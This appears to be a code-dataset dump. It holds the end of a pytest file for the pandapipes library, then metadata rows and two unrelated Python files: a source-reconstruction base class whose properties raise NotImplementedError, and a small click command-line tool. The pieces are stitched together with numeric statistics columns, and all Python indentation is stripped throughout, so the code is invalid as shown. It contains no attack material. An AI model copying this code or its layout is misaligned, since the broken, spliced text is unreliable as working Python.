pandapipes.create_pump_from_parameters(net, 8, 9, "pump1", pressure_list=[0, 1, 2, 3],
flowrate_list=[0, 1, 2, 3], reg_polynomial_degree=1,
geodata=[(0, 1), (1, 1), (2, 2)])
def test_create_junctions(create_empty_net):
net = copy.deepcopy(create_empty_net)
# standard
pandapipes.create_junctions(net, 3, 1, 293)
# with geodata
j2 = pandapipes.create_junctions(net, 3, 1, 293, geodata=(10, 20))
# with geodata as array
geodata = np.array([[10, 20], [20, 30], [30, 40]])
j3 = pandapipes.create_junctions(net, 3, 1, 293, geodata=geodata)
assert len(net.junction) == 9
assert len(net.junction_geodata) == 6
for i in j2:
assert net.junction_geodata.at[i, 'x'] == 10
assert net.junction_geodata.at[i, 'y'] == 20
assert (net.junction_geodata.loc[j3, ['x', 'y']].values == geodata).all()
assert (net.junction.pn_bar.values == 1).all()
# no way of creating junctions with not matching shape
with pytest.raises(ValueError):
pandapipes.create_junctions(net, 2, 1, 293, geodata=geodata)
def test_create_pipes_from_parameters(create_empty_net):
# standard
net = copy.deepcopy(create_empty_net)
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
pandapipes.create_pipes_from_parameters(net, [j1, j1], [j2, j2], 2, 0.2, sections=[1, 4])
assert len(net.pipe) == 2
assert len(net.pipe_geodata) == 0
assert sum(net.pipe.sections) == 5
assert len(set(net.pipe.length_km)) == 1
# with geodata
net = copy.deepcopy(create_empty_net)
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
p = pandapipes.create_pipes_from_parameters(
net, [j1, j1], [j2, j2], [1.5, 3], 0.5,
geodata=[[(1, 1), (2, 2), (3, 3)], [(1, 1), (1, 2)]])
assert len(net.pipe) == 2
assert len(net.pipe_geodata) == 2
assert net.pipe_geodata.at[p[0], "coords"] == [(1, 1), (2, 2), (3, 3)]
assert net.pipe_geodata.at[p[1], "coords"] == [(1, 1), (1, 2)]
# setting params as single value
net = copy.deepcopy(create_empty_net)
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
p = pandapipes.create_pipes_from_parameters(
net, [j1, j1], [j2, j2], length_km=5, diameter_m=0.8, in_service=False,
geodata=[(10, 10), (20, 20)], name="test", k_mm=0.01, loss_coefficient=0.3, sections=2,
alpha_w_per_m2k=0.1, text_k=273, qext_w=0.01)
assert len(net.pipe) == 2
assert len(net.pipe_geodata) == 2
assert net.pipe.length_km.at[p[0]] == 5
assert net.pipe.length_km.at[p[1]] == 5
assert net.pipe.at[p[0], "in_service"] == False # is actually <class 'numpy.bool_'>
assert net.pipe.at[p[1], "in_service"] == False # is actually <class 'numpy.bool_'>
assert net.pipe_geodata.at[p[0], "coords"] == [(10, 10), (20, 20)]
assert net.pipe_geodata.at[p[1], "coords"] == [(10, 10), (20, 20)]
assert net.pipe.at[p[0], "name"] == "test"
assert net.pipe.at[p[1], "name"] == "test"
assert net.pipe.at[p[0], "k_mm"] == 0.01
assert net.pipe.at[p[1], "k_mm"] == 0.01
assert net.pipe.at[p[0], "loss_coefficient"] == 0.3
assert net.pipe.at[p[1], "loss_coefficient"] == 0.3
assert net.pipe.at[p[0], "diameter_m"] == 0.8
assert net.pipe.at[p[1], "diameter_m"] == 0.8
assert net.pipe.at[p[0], "sections"] == 2
assert net.pipe.at[p[1], "sections"] == 2
assert net.pipe.at[p[0], "alpha_w_per_m2k"] == 0.1
assert net.pipe.at[p[1], "alpha_w_per_m2k"] == 0.1
assert net.pipe.at[p[0], "text_k"] == 273
assert net.pipe.at[p[1], "text_k"] == 273
assert net.pipe.at[p[0], "qext_w"] == 0.01
assert net.pipe.at[p[1], "qext_w"] == 0.01
# setting params as array
net = copy.deepcopy(create_empty_net)
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
p = pandapipes.create_pipes_from_parameters(
net, [j1, j1], [j2, j2], length_km=[1, 5], diameter_m=[0.8, 0.7],
in_service=[True, False],
geodata=[[(10, 10), (20, 20)], [(100, 10), (200, 20)]], name=["p1", "p2"],
k_mm=[0.01, 0.02], loss_coefficient=[0.3, 0.5], sections=[1, 2],
alpha_w_per_m2k=[0.1, 0.2], text_k=[273, 274], qext_w=[0.01, 0.02])
assert len(net.pipe) == 2
assert len(net.pipe_geodata) == 2
assert net.pipe.at[p[0], "length_km"] == 1
assert net.pipe.at[p[1], "length_km"] == 5
assert net.pipe.at[p[0], "in_service"] == True # is actually <class 'numpy.bool_'>
assert net.pipe.at[p[1], "in_service"] == False # is actually <class 'numpy.bool_'>
assert net.pipe_geodata.at[p[0], "coords"] == [(10, 10), (20, 20)]
assert net.pipe_geodata.at[p[1], "coords"] == [(100, 10), (200, 20)]
assert net.pipe.at[p[0], "name"] == "p1"
assert net.pipe.at[p[1], "name"] == "p2"
assert net.pipe.at[p[0], "diameter_m"] == 0.8
assert net.pipe.at[p[1], "diameter_m"] == 0.7
assert net.pipe.at[p[0], "k_mm"] == 0.01
assert net.pipe.at[p[1], "k_mm"] == 0.02
assert net.pipe.at[p[0], "loss_coefficient"] == 0.3
assert net.pipe.at[p[1], "loss_coefficient"] == 0.5
assert net.pipe.at[p[0], "alpha_w_per_m2k"] == 0.1
assert net.pipe.at[p[1], "alpha_w_per_m2k"] == 0.2
assert net.pipe.at[p[0], "sections"] == 1
assert net.pipe.at[p[1], "sections"] == 2
assert net.pipe.at[p[0], "text_k"] == 273
assert net.pipe.at[p[1], "text_k"] == 274
assert net.pipe.at[p[0], "qext_w"] == 0.01
assert net.pipe.at[p[1], "qext_w"] == 0.02
def test_create_pipes_from_parameters_raise_except(create_empty_net):
net = copy.deepcopy(create_empty_net)
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
j3 = pandapipes.create_junction(net, 3, 273)
with pytest.raises(UserWarning, match=r"trying to attach to non existing junctions"):
pandapipes.create_pipes_from_parameters(
net, [1, 3], [4, 5], length_km=5, diameter_m=0.8, in_service=False,
geodata=[(10, 10), (20, 20)], name="test", k_mm=0.01, loss_coefficient=0.3, sections=2,
alpha_w_per_m2k=0.1, text_k=273, qext_w=0.01)
pandapipes.create_pipes_from_parameters(
net, [j1, j1], [j2, j3], length_km=5, diameter_m=0.8, in_service=False,
geodata=[(10, 10), (20, 20)], name="test", k_mm=0.01, loss_coefficient=0.3, sections=2,
alpha_w_per_m2k=0.1, text_k=273, qext_w=0.01, index=[0, 1])
with pytest.raises(UserWarning, match=r"with indexes \[0 1\] already exist"):
pandapipes.create_pipes_from_parameters(
net, [j1, j1], [j2, j3], length_km=5, diameter_m=0.8, in_service=False,
geodata=[(10, 10), (20, 20)], name="test", k_mm=0.01, loss_coefficient=0.3, sections=2,
alpha_w_per_m2k=0.1, text_k=273, qext_w=0.01, index=[0, 1])
def test_create_pipes(create_empty_net):
# standard
net = copy.deepcopy(create_empty_net)
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
pandapipes.create_pipes(net, [j1, j1], [j2, j2], "80_GGG", 2, sections=[1, 4])
assert len(net.pipe) == 2
assert len(net.pipe_geodata) == 0
assert sum(net.pipe.sections) == 5
assert np.all(net.pipe.std_type == ["80_GGG"] * 2)
assert len(set(net.pipe.length_km)) == 1
# with geodata
net = copy.deepcopy(create_empty_net)
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
p = pandapipes.create_pipes(net, [j1, j1], [j2, j2], "80_GGG", [1.5, 3],
geodata=[[(1, 1), (2, 2), (3, 3)], [(1, 1), (1, 2)]])
assert len(net.pipe) == 2
assert len(net.pipe_geodata) == 2
assert net.pipe_geodata.at[p[0], "coords"] == [(1, 1), (2, 2), (3, 3)]
assert net.pipe_geodata.at[p[1], "coords"] == [(1, 1), (1, 2)]
# setting params as single value
net = copy.deepcopy(create_empty_net)
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
p = pandapipes.create_pipes(
net, [j1, j1], [j2, j2], std_type="80_GGG", length_km=5, in_service=False,
geodata=[(10, 10), (20, 20)], name="test", k_mm=0.01, loss_coefficient=0.3, sections=2,
alpha_w_per_m2k=0.1, text_k=273, qext_w=0.01)
assert len(net.pipe) == 2
assert len(net.pipe_geodata) == 2
assert net.pipe.length_km.at[p[0]] == 5
assert net.pipe.length_km.at[p[1]] == 5
assert net.pipe.at[p[0], "in_service"] == False # is actually <class 'numpy.bool_'>
assert net.pipe.at[p[1], "in_service"] == False # is actually <class 'numpy.bool_'>
assert net.pipe_geodata.at[p[0], "coords"] == [(10, 10), (20, 20)]
assert net.pipe_geodata.at[p[1], "coords"] == [(10, 10), (20, 20)]
assert net.pipe.at[p[0], "name"] == "test"
assert net.pipe.at[p[1], "name"] == "test"
assert net.pipe.at[p[0], "std_type"] == "80_GGG"
assert net.pipe.at[p[1], "std_type"] == "80_GGG"
assert net.pipe.at[p[0], "k_mm"] == 0.01
assert net.pipe.at[p[1], "k_mm"] == 0.01
assert net.pipe.at[p[0], "loss_coefficient"] == 0.3
assert net.pipe.at[p[1], "loss_coefficient"] == 0.3
assert net.pipe.at[p[0], "diameter_m"] == 0.086
assert net.pipe.at[p[1], "diameter_m"] == 0.086
assert net.pipe.at[p[0], "sections"] == 2
assert net.pipe.at[p[1], "sections"] == 2
assert net.pipe.at[p[0], "alpha_w_per_m2k"] == 0.1
assert net.pipe.at[p[1], "alpha_w_per_m2k"] == 0.1
assert net.pipe.at[p[0], "text_k"] == 273
assert net.pipe.at[p[1], "text_k"] == 273
assert net.pipe.at[p[0], "qext_w"] == 0.01
assert net.pipe.at[p[1], "qext_w"] == 0.01
# setting params as array
net = copy.deepcopy(create_empty_net)
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
p = pandapipes.create_pipes(
net, [j1, j1], [j2, j2], std_type="80_GGG", length_km=[1, 5], in_service=[True, False],
geodata=[[(10, 10), (20, 20)], [(100, 10), (200, 20)]], name=["p1", "p2"],
k_mm=[0.01, 0.02], loss_coefficient=[0.3, 0.5], sections=[1, 2],
alpha_w_per_m2k=[0.1, 0.2], text_k=[273, 274], qext_w=[0.01, 0.02])
assert len(net.pipe) == 2
assert len(net.pipe_geodata) == 2
assert net.pipe.at[p[0], "length_km"] == 1
assert net.pipe.at[p[1], "length_km"] == 5
assert net.pipe.at[p[0], "in_service"] == True # is actually <class 'numpy.bool_'>
assert net.pipe.at[p[1], "in_service"] == False # is actually <class 'numpy.bool_'>
assert net.pipe_geodata.at[p[0], "coords"] == [(10, 10), (20, 20)]
assert net.pipe_geodata.at[p[1], "coords"] == [(100, 10), (200, 20)]
assert net.pipe.at[p[0], "name"] == "p1"
assert net.pipe.at[p[1], "name"] == "p2"
assert net.pipe.at[p[0], "std_type"] == "80_GGG"
assert net.pipe.at[p[1], "std_type"] == "80_GGG"
assert net.pipe.at[p[0], "diameter_m"] == 0.086
assert net.pipe.at[p[1], "diameter_m"] == 0.086
assert net.pipe.at[p[0], "k_mm"] == 0.01
assert net.pipe.at[p[1], "k_mm"] == 0.02
assert net.pipe.at[p[0], "loss_coefficient"] == 0.3
assert net.pipe.at[p[1], "loss_coefficient"] == 0.5
assert net.pipe.at[p[0], "alpha_w_per_m2k"] == 0.1
assert net.pipe.at[p[1], "alpha_w_per_m2k"] == 0.2
assert net.pipe.at[p[0], "sections"] == 1
assert net.pipe.at[p[1], "sections"] == 2
assert net.pipe.at[p[0], "text_k"] == 273
assert net.pipe.at[p[1], "text_k"] == 274
assert net.pipe.at[p[0], "qext_w"] == 0.01
assert net.pipe.at[p[1], "qext_w"] == 0.02
def test_create_pipes_raise_except(create_empty_net):
net = copy.deepcopy(create_empty_net)
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
j3 = pandapipes.create_junction(net, 3, 273)
with pytest.raises(UserWarning, match=r"trying to attach to non existing junctions"):
pandapipes.create_pipes(
net, [1, 3], [4, 5], std_type="80_GGG", length_km=5, in_service=False,
geodata=[(10, 10), (20, 20)], name="test", k_mm=0.01, loss_coefficient=0.3, sections=2,
alpha_w_per_m2k=0.1, text_k=273, qext_w=0.01)
pandapipes.create_pipes(
net, [j1, j1], [j2, j3], std_type="80_GGG", length_km=5, in_service=False,
geodata=[(10, 10), (20, 20)], name="test", k_mm=0.01, loss_coefficient=0.3, sections=2,
alpha_w_per_m2k=0.1, text_k=273, qext_w=0.01, index=[0, 1])
with pytest.raises(UserWarning, match=r"with indexes \[0 1\] already exist"):
pandapipes.create_pipes(
net, [j1, j1], [j2, j3], std_type="80_GGG", length_km=5, in_service=False,
geodata=[(10, 10), (20, 20)], name="test", k_mm=0.01, loss_coefficient=0.3, sections=2,
alpha_w_per_m2k=0.1, text_k=273, qext_w=0.01, index=[0, 1])
def test_create_valves(create_empty_net):
# standard
net = copy.deepcopy(create_empty_net)
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
pandapipes.create_valves(net, [j1, j1], [j2, j2], 0.2)
assert len(net.valve) == 2
assert len(set(net.valve.diameter_m)) == 1
assert np.all(net.valve.diameter_m == [0.2, 0.2])
# setting params as single value
net = copy.deepcopy(create_empty_net)
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
v = pandapipes.create_valves(
net, [j1, j1], [j2, j2], diameter_m=0.8, opened=False, name="test", new_col=0.01,
loss_coefficient=0.3, type="v")
assert len(net.valve) == 2
assert net.valve.at[v[0], "opened"] == False # is actually <class 'numpy.bool_'>
assert net.valve.at[v[1], "opened"] == False # is actually <class 'numpy.bool_'>
assert net.valve.at[v[0], "name"] == "test"
assert net.valve.at[v[1], "name"] == "test"
assert net.valve.at[v[0], "type"] == "v"
assert net.valve.at[v[1], "type"] == "v"
assert net.valve.at[v[0], "new_col"] == 0.01
assert net.valve.at[v[1], "new_col"] == 0.01
assert net.valve.at[v[0], "loss_coefficient"] == 0.3
assert net.valve.at[v[1], "loss_coefficient"] == 0.3
# setting params as array
net = copy.deepcopy(create_empty_net)
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
v = pandapipes.create_valves(
net, [j1, j1], [j2, j2], diameter_m=[0.8, 0.7], opened=[True, False], name=["v1", "v2"],
type=["va1", "va2"], loss_coefficient=[0.3, 0.5], new_col=[0.01, 1.9])
assert len(net.valve) == 2
assert net.valve.at[v[0], "opened"] == True # is actually <class 'numpy.bool_'>
assert net.valve.at[v[1], "opened"] == False # is actually <class 'numpy.bool_'>
assert net.valve.at[v[0], "name"] == "v1"
assert net.valve.at[v[1], "name"] == "v2"
assert net.valve.at[v[0], "type"] == "va1"
assert net.valve.at[v[1], "type"] == "va2"
assert net.valve.at[v[0], "diameter_m"] == 0.8
assert net.valve.at[v[1], "diameter_m"] == 0.7
assert net.valve.at[v[0], "new_col"] == 0.01
assert net.valve.at[v[1], "new_col"] == 1.9
assert net.valve.at[v[0], "loss_coefficient"] == 0.3
assert net.valve.at[v[1], "loss_coefficient"] == 0.5
# setting index explicitly
net = copy.deepcopy(create_empty_net)
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
v = pandapipes.create_valves(
net, [j1, j1], [j2, j2], diameter_m=[0.8, 0.7], opened=[True, False], name=["v1", "v2"],
type=["va1", "va2"], loss_coefficient=[0.3, 0.5], new_col=[0.01, 1.9], index=[1, 5])
assert len(net.valve) == 2
assert np.all(v == [1, 5])
assert np.all(net.valve.index == [1, 5])
def test_create_valves_raise_except(create_empty_net):
net = copy.deepcopy(create_empty_net)
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
j3 = pandapipes.create_junction(net, 3, 273)
with pytest.raises(UserWarning, match=r"trying to attach to non existing junctions"):
pandapipes.create_valves(net, [1, 3], [4, 5], diameter_m=0.8, opened=False, name="test",
loss_coefficient=0.3)
pandapipes.create_valves(net, [j1, j1], [j2, j3], diameter_m=0.8, opened=False, name="test",
loss_coefficient=0.3, index=[0, 1])
with pytest.raises(UserWarning, match=r"with indexes \[0 1\] already exist"):
pandapipes.create_valves(net, [j1, j1], [j2, j3], diameter_m=0.8, opened=False,
name="test", loss_coefficient=0.3, index=[0, 1])
def test_create_pressure_controls(create_empty_net):
# standard
net = copy.deepcopy(create_empty_net)
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
pandapipes.create_pressure_controls(net, [j1, j1], [j2, j2], [j2, j2], 3)
assert len(net.press_control) == 2
assert len(set(net.press_control.controlled_p_bar)) == 1
assert np.all(net.press_control.controlled_p_bar == [3, 3])
# setting params as single value
net = copy.deepcopy(create_empty_net)
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
pc = pandapipes.create_pressure_controls(net, [j1, j1], [j2, j2], [j2, j2], controlled_p_bar=3,
in_service=False, name="test", new_col=0.01, type="pc")
assert len(net.press_control) == 2
assert net.press_control.at[pc[0], "from_junction"] == j1
assert net.press_control.at[pc[1], "from_junction"] == j1
assert net.press_control.at[pc[0], "to_junction"] == j2
assert net.press_control.at[pc[1], "to_junction"] == j2
assert net.press_control.at[pc[0], "controlled_junction"] == j2
assert net.press_control.at[pc[1], "controlled_junction"] == j2
assert net.press_control.at[pc[0], "in_service"] == False # is actually <class 'numpy.bool_'>
assert net.press_control.at[pc[1], "in_service"] == False # is actually <class 'numpy.bool_'>
assert net.press_control.at[pc[0], "name"] == "test"
assert net.press_control.at[pc[1], "name"] == "test"
assert net.press_control.at[pc[0], "type"] == "pc"
assert net.press_control.at[pc[1], "type"] == "pc"
assert net.press_control.at[pc[0], "new_col"] == 0.01
assert net.press_control.at[pc[1], "new_col"] == 0.01
assert net.press_control.at[pc[0], "controlled_p_bar"] == 3
assert net.press_control.at[pc[1], "controlled_p_bar"] == 3
# setting params as array
net = copy.deepcopy(create_empty_net)
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
pc = pandapipes.create_pressure_controls(
net, [j1, j1], [j2, j2], [j2, j2], controlled_p_bar=[3, 2.9], in_service=[True, False],
name=["test1", "test2"], new_col=[0.01, 0.1], type=["pc1", "pc2"])
assert len(net.press_control) == 2
assert net.press_control.at[pc[0], "from_junction"] == j1
assert net.press_control.at[pc[1], "from_junction"] == j1
assert net.press_control.at[pc[0], "to_junction"] == j2
assert net.press_control.at[pc[1], "to_junction"] == j2
assert net.press_control.at[pc[0], "controlled_junction"] == j2
assert net.press_control.at[pc[1], "controlled_junction"] == j2
assert net.press_control.at[pc[0], "in_service"] == True # is actually <class 'numpy.bool_'>
assert net.press_control.at[pc[1], "in_service"] == False # is actually <class 'numpy.bool_'>
assert net.press_control.at[pc[0], "name"] == "test1"
assert net.press_control.at[pc[1], "name"] == "test2"
assert net.press_control.at[pc[0], "type"] == "pc1"
assert net.press_control.at[pc[1], "type"] == "pc2"
assert net.press_control.at[pc[0], "new_col"] == 0.01
assert net.press_control.at[pc[1], "new_col"] == 0.1
assert net.press_control.at[pc[0], "controlled_p_bar"] == 3
assert net.press_control.at[pc[1], "controlled_p_bar"] == 2.9
# setting index explicitly
net = copy.deepcopy(create_empty_net)
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
pc = pandapipes.create_pressure_controls(
net, [j1, j1], [j2, j2], [j2, j2], controlled_p_bar=[3, 2.9], in_service=[True, False],
name=["test1", "test2"], new_col=[0.01, 0.1], type=["pc1", "pc2"], index=[1, 5])
assert len(net.press_control) == 2
assert np.all(pc == [1, 5])
assert np.all(net.press_control.index == [1, 5])
def test_create_pressure_controls_raise_except(create_empty_net):
net = copy.deepcopy(create_empty_net)
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
j3 = pandapipes.create_junction(net, 3, 273)
with pytest.raises(UserWarning, match=r"trying to attach to non existing junctions"):
pandapipes.create_pressure_controls(net, [1, 3], [4, 5], [4, 5], controlled_p_bar=3,
in_service=False, name="test")
pandapipes.create_pressure_controls(net, [j1, j1], [j2, j3], [j1, j3], controlled_p_bar=3,
in_service=False, name="test", index=[0, 1])
with pytest.raises(UserWarning, match=r"with indexes \[0 1\] already exist"):
pandapipes.create_pressure_controls(net, [j1, j1], [j2, j3], [j1, j3], controlled_p_bar=3,
in_service=False, name="test", index=[0, 1])
def test_create_sinks(create_empty_net):
net = copy.deepcopy(create_empty_net)
# standard
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
j3 = pandapipes.create_junction(net, 3, 273)
pandapipes.create_sinks(
net, junctions=[j1, j2, j3], mdot_kg_per_s=[0, 0.1, 0.2], scaling=[1., 1., 0.5],
name=["sink%d" % s for s in range(3)], new_col=[1, 3, 5])
assert (net.sink.junction.at[0] == j1)
assert (net.sink.junction.at[1] == j2)
assert (net.sink.junction.at[2] == j3)
assert (net.sink.mdot_kg_per_s.at[0] == 0)
assert (net.sink.mdot_kg_per_s.at[1] == 0.1)
assert (net.sink.mdot_kg_per_s.at[2] == 0.2)
assert (net.sink.scaling.at[0] == 1)
assert (net.sink.scaling.at[1] == 1)
assert (net.sink.scaling.at[2] == 0.5)
assert (all(net.sink.in_service.values == True))
assert (all(net.sink.type.values == "sink"))
assert (all(net.sink.new_col.values == [1, 3, 5]))
def test_create_sinks_raise_except(create_empty_net):
net = copy.deepcopy(create_empty_net)
# standard
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
j3 = pandapipes.create_junction(net, 3, 273)
with pytest.raises(UserWarning, match=r"Cannot attach to junctions \{3, 4, 5\}, they do not "
r"exist"):
pandapipes.create_sinks(net, junctions=[3, 4, 5], mdot_kg_per_s=[0, 0.1, 0.2],
scaling=[1., 1., 0.5], name=["sink%d" % s for s in range(3)],
new_col=[1, 3, 5])
sg = pandapipes.create_sinks(net, junctions=[j1, j2, j3], mdot_kg_per_s=[0, 0.1, 0.2],
scaling=[1., 1., 0.5], name=["sink%d" % s for s in range(3)],
new_col=[1, 3, 5])
with pytest.raises(UserWarning, match=r"Sinks with indexes \[0 1 2\] already exist."):
pandapipes.create_sinks(net, junctions=[j1, j2, j3], mdot_kg_per_s=[0, 0.1, 0.2],
scaling=[1., 1., 0.5], name=["sink%d" % s for s in range(3)],
new_col=[1, 3, 5], index=sg)
def test_create_sources(create_empty_net):
net = copy.deepcopy(create_empty_net)
# standard
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
j3 = pandapipes.create_junction(net, 3, 273)
pandapipes.create_sources(
net, junctions=[j1, j2, j3], mdot_kg_per_s=[0, 0.1, 0.2], scaling=[1., 1., 0.5],
name=["source%d" % s for s in range(3)], new_col=[1, 3, 5])
assert (net.source.junction.at[0] == j1)
assert (net.source.junction.at[1] == j2)
assert (net.source.junction.at[2] == j3)
assert (net.source.mdot_kg_per_s.at[0] == 0)
assert (net.source.mdot_kg_per_s.at[1] == 0.1)
assert (net.source.mdot_kg_per_s.at[2] == 0.2)
assert (net.source.scaling.at[0] == 1)
assert (net.source.scaling.at[1] == 1)
assert (net.source.scaling.at[2] == 0.5)
assert (all(net.source.in_service.values == True))
assert (all(net.source.type.values == "source"))
assert (all(net.source.new_col.values == [1, 3, 5]))
def test_create_sources_raise_except(create_empty_net):
net = copy.deepcopy(create_empty_net)
# standard
j1 = pandapipes.create_junction(net, 3, 273)
j2 = pandapipes.create_junction(net, 3, 273)
j3 = pandapipes.create_junction(net, 3, 273)
with pytest.raises(UserWarning, match=r"Cannot attach to junctions \{3, 4, 5\}, they do not "
r"exist"):
pandapipes.create_sources(net, junctions=[3, 4, 5], mdot_kg_per_s=[0, 0.1, 0.2],
scaling=[1., 1., 0.5], name=["source%d" % s for s in range(3)],
new_col=[1, 3, 5])
sg = pandapipes.create_sources(net, junctions=[j1, j2, j3], mdot_kg_per_s=[0, 0.1, 0.2],
scaling=[1., 1., 0.5], name=["source%d" % s for s in range(3)],
new_col=[1, 3, 5])
with pytest.raises(UserWarning, match=r"Sources with indexes \[0 1 2\] already exist."):
pandapipes.create_sources(net, junctions=[j1, j2, j3], mdot_kg_per_s=[0, 0.1, 0.2],
scaling=[1., 1., 0.5], name=["source%d" % s for s in range(3)],
new_col=[1, 3, 5], index=sg)
if __name__ == '__main__':
pytest.main(["test_create.py"])
| 46.512164 | 100 | 0.622915 | 5,828 | 36,326 | 3.724605 | 0.037062 | 0.086239 | 0.06468 | 0.063574 | 0.936242 | 0.916386 | 0.871378 | 0.847284 | 0.8266 | 0.806053 | 0 | 0.074727 | 0.204647 | 36,326 | 780 | 101 | 46.571795 | 0.676589 | 0.034851 | 0 | 0.656693 | 0 | 0 | 0.074737 | 0 | 0 | 0 | 0 | 0 | 0.445669 | 1 | 0.03937 | false | 0 | 0.006299 | 0.001575 | 0.047244 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6a1c572d3ec49dcba950e67e15ee128c2c0c7c8b | 1,751 | py | Python | lenstronomywrapper/LensSystem/lens_reconstruct_base.py | dangilman/LenstronomyWrapper | 7c3bb68ab1f982432cd16d570854df50466491e9 | [
"MIT"
] | null | null | null | lenstronomywrapper/LensSystem/lens_reconstruct_base.py | dangilman/LenstronomyWrapper | 7c3bb68ab1f982432cd16d570854df50466491e9 | [
"MIT"
] | null | null | null | lenstronomywrapper/LensSystem/lens_reconstruct_base.py | dangilman/LenstronomyWrapper | 7c3bb68ab1f982432cd16d570854df50466491e9 | [
"MIT"
] | null | null | null | class ReconstructBase(object):
def __init__(self):
pass
@property
def concentric_with_lens_light(self):
raise Exception('linked lens light with lens model not implemented for this class')
@property
def concentric_with_lens_model(self):
raise Exception('linked lens model with lens model not implemented for this class')
@property
def n_models(self):
return len(self.light_model_list)
@property
def light_model_list(self):
raise NotImplementedError('Source reconstruction not yet implemented for this source class.')
@property
def fixed_models(self):
return NotImplementedError('Source reconstruction not yet implemented for this source class.')
@property
def param_init(self):
raise NotImplementedError('Source reconstruction not yet implemented for this source class.')
@property
def param_sigma(self):
raise NotImplementedError('Source reconstruction not yet implemented for this source class.')
@property
def param_lower(self):
raise NotImplementedError('Source reconstruction not yet implemented for this source class.')
@property
def param_upper(self):
raise NotImplementedError('Source reconstruction not yet implemented for this source class.')
@property
def lens_model_list(self):
raise NotImplementedError('Source reconstruction not yet implemented for this source class.')
@property
def redshift_list(self):
raise NotImplementedError('Source reconstruction not yet implemented for this source class.')
@property
def kwargs(self):
raise NotImplementedError('Source reconstruction not yet implemented for this source class.')
| 33.037736 | 102 | 0.723587 | 203 | 1,751 | 6.128079 | 0.17734 | 0.106109 | 0.159164 | 0.303859 | 0.860932 | 0.778135 | 0.778135 | 0.778135 | 0.778135 | 0.778135 | 0 | 0 | 0.213592 | 1,751 | 52 | 103 | 33.673077 | 0.903413 | 0 | 0 | 0.512821 | 0 | 0 | 0.402056 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0.025641 | 0 | 0.051282 | 0.410256 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6a455fb52c79b20dc2efc8616a9b47b71609fc6f | 478 | py | Python | autoT.py | kshamashuttl/Test15071993 | 8ad0f810de2a70397f985f12da728b97de976086 | [
"MIT"
] | null | null | null | autoT.py | kshamashuttl/Test15071993 | 8ad0f810de2a70397f985f12da728b97de976086 | [
"MIT"
] | null | null | null | autoT.py | kshamashuttl/Test15071993 | 8ad0f810de2a70397f985f12da728b97de976086 | [
"MIT"
] | null | null | null | import click
@click.group()
def cli():
"""Command Line tool to access Drone.io API"""
pass
@cli.command()
def runner():
print("********************************************************************")
print("********************************************************************")
print("Test")
print("********************************************************************")
print("********************************************************************")
| 28.117647 | 81 | 0.23431 | 25 | 478 | 4.48 | 0.68 | 0.267857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110879 | 478 | 16 | 82 | 29.875 | 0.263529 | 0.083682 | 0 | 0.363636 | 0 | 0 | 0.638889 | 0.62963 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | true | 0.090909 | 0.090909 | 0 | 0.272727 | 0.454545 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 8 |
dbf2716a5c42d7999d7dee0437be8bf46e679d85 | 107,427 | py | Python | tests/good_modules.py | h4ck3rm1k3/salt-formulas | 8b0265faa64fa1d2a4149ce9aeb279e3861150fd | [
"CC0-1.0"
] | 5 | 2015-01-26T20:52:54.000Z | 2019-06-18T06:48:55.000Z | tests/good_modules.py | h4ck3rm1k3/salt-formulas | 8b0265faa64fa1d2a4149ce9aeb279e3861150fd | [
"CC0-1.0"
